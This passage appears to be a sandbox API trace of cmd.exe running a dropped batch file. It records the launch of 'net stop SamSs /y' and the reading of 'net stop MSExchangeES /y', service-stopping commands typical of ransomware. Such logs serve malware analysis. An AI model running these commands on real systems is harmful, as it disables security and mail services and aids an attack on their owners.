_String2="FTYPE") returned 8 [0208.806] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0208.806] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0208.806] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0208.806] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0208.806] SetErrorMode (uMode=0x0) returned 0x1 [0208.806] GetProcessHeap () returned 0x3e0000 [0208.806] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0208.806] GetProcessHeap () returned 0x3e0000 [0208.806] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0208.807] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.807] GetProcessHeap () returned 0x3e0000 [0208.807] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0208.807] GetProcessHeap () returned 0x3e0000 [0208.807] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0208.807] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0208.807] GetProcessHeap () returned 0x3e0000 [0208.807] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0208.807] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.807] GetProcessHeap () returned 0x3e0000 [0208.807] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0208.808] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0208.808] GetProcessHeap () returned 0x3e0000 [0208.808] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0208.808] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.809] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.809] GetLastError () returned 0x2 [0208.809] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.809] GetLastError () returned 0x2 [0208.810] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.810] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.810] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.811] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0208.811] GetLastError () returned 0x2 [0208.811] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0208.811] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.812] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.812] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0208.812] SetErrorMode (uMode=0x0) returned 0x1 [0208.812] GetProcessHeap () returned 0x3e0000 [0208.812] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0208.812] GetProcessHeap () returned 0x3e0000 [0208.812] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0208.813] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.813] GetProcessHeap () returned 0x3e0000 [0208.813] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0208.813] GetProcessHeap () returned 0x3e0000 [0208.813] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0208.813] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0208.813] GetProcessHeap () returned 0x3e0000 [0208.813] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0208.813] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.813] GetProcessHeap () returned 0x3e0000 [0208.813] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0208.813] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0208.813] GetProcessHeap () returned 0x3e0000 [0208.814] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0208.814] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.814] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.814] GetLastError () returned 0x2 [0208.815] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.815] GetLastError () returned 0x2 [0208.815] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.816] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0208.816] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.816] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0208.816] GetLastError () returned 0x2 [0208.817] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0208.817] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0208.817] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.817] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0208.817] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0208.817] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0208.818] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0208.818] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SamSs /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SamSs /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SamSs /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xa04, dwThreadId=0x8f4)) returned 1 [0208.821] CloseHandle (hObject=0x78) returned 1 [0208.822] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.822] GetProcessHeap () returned 0x3e0000 [0208.822] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0208.822] GetEnvironmentStringsW () returned 0x3f8408* [0208.822] GetProcessHeap () returned 0x3e0000 [0208.822] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0208.822] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0208.822] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0209.084] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0209.084] CloseHandle (hObject=0x74) returned 1 [0209.084] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0209.084] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0209.084] GetProcessHeap () returned 0x3e0000 [0209.084] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.084] GetEnvironmentStringsW () returned 0x3f8408* [0209.084] GetProcessHeap () returned 0x3e0000 [0209.084] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.084] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.085] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.085] GetProcessHeap () returned 0x3e0000 [0209.085] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0209.085] GetEnvironmentStringsW () returned 0x3f8408* [0209.085] GetProcessHeap () returned 0x3e0000 [0209.085] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0209.085] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0209.085] GetProcessHeap () returned 0x3e0000 [0209.085] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0209.085] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0209.085] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.085] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0209.085] _get_osfhandle (_FileHandle=1) returned 0x264 [0209.085] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0209.085] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.085] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0209.086] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0209.086] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0209.086] SetConsoleInputExeNameW () returned 0x1 [0209.086] GetConsoleOutputCP () returned 0x1b5 [0209.086] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0209.086] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0209.086] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0209.086] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.086] SetFilePointer (in: hFile=0x74, lDistanceToMove=4540, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11bc [0209.086] GetProcessHeap () returned 0x3e0000 [0209.086] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0209.087] GetProcessHeap () returned 0x3e0000 [0209.087] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0209.087] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.087] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11bc [0209.087] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x705, lpOverlapped=0x0) returned 1 [0209.087] SetFilePointer (in: hFile=0x74, lDistanceToMove=4566, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x11d6 [0209.087] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSExchangeES /y\r\n\r\n12 /y\r\neΓÇ¥ /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 26 [0209.088] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.088] GetFileType (hFile=0x74) returned 0x1 [0209.088] _get_osfhandle (_FileHandle=3) returned 0x74 [0209.088] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x11d6 [0209.088] GetProcessHeap () returned 0x3e0000 [0209.088] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0209.088] GetProcessHeap () returned 0x3e0000 [0209.088] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0209.091] _tell (_FileHandle=3) returned 4566 [0209.091] _close (_FileHandle=3) returned 0 [0209.091] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0209.091] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0209.091] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0209.091] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0209.092] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0209.092] _wcsicmp (_String1="net", _String2="CD") returned 11 [0209.092] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0209.092] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0209.092] _wcsicmp (_String1="net", _String2="REN") returned -4 [0209.092] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0209.092] _wcsicmp (_String1="net", _String2="SET") returned -5 [0209.092] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0209.092] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0209.092] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0209.092] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0209.092] _wcsicmp (_String1="net", _String2="MD") returned 1 [0209.092] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0209.092] _wcsicmp (_String1="net", _String2="RD") returned -4 [0209.092] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0209.092] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0209.092] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0209.092] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0209.092] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0209.092] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0209.092] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0209.092] _wcsicmp (_String1="net", _String2="VER") returned -8 [0209.092] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0209.092] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0209.092] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0209.092] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0209.092] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0209.092] _wcsicmp (_String1="net", _String2="START") returned -5 [0209.092] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0209.092] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0209.092] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0209.092] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0209.092] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0209.092] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0209.092] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0209.092] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0209.092] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0209.092] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0209.093] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0209.093] SetErrorMode (uMode=0x0) returned 0x1 [0209.093] GetProcessHeap () returned 0x3e0000 [0209.093] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0209.093] GetProcessHeap () returned 0x3e0000 [0209.093] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0209.093] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.093] GetProcessHeap () returned 0x3e0000 [0209.093] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0209.093] GetProcessHeap () returned 0x3e0000 [0209.093] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0209.094] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0209.094] GetProcessHeap () returned 0x3e0000 [0209.094] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0209.094] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.094] GetProcessHeap () returned 0x3e0000 [0209.094] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0209.094] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0209.094] GetProcessHeap () returned 0x3e0000 [0209.094] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0209.095] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.095] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.095] GetLastError () returned 0x2 [0209.096] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.096] GetLastError () returned 0x2 [0209.096] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.096] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.097] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0209.097] GetLastError () returned 0x2 [0209.097] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0209.098] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0209.098] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0209.099] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0209.099] SetErrorMode (uMode=0x0) returned 0x1 [0209.099] GetProcessHeap () returned 0x3e0000 [0209.099] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0209.099] GetProcessHeap () returned 0x3e0000 [0209.099] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0209.099] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0209.099] GetProcessHeap () returned 0x3e0000 [0209.099] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0209.099] GetProcessHeap () returned 0x3e0000 [0209.099] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0209.100] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0209.100] GetProcessHeap () returned 0x3e0000 [0209.100] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0209.100] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0209.100] GetProcessHeap () returned 0x3e0000 [0209.100] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0209.100] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0209.100] GetProcessHeap () returned 0x3e0000 [0209.100] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0209.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.101] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.101] GetLastError () returned 0x2 [0209.101] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0209.101] GetLastError () returned 0x2 [0209.102] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0209.102] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0209.102] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0209.103] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, 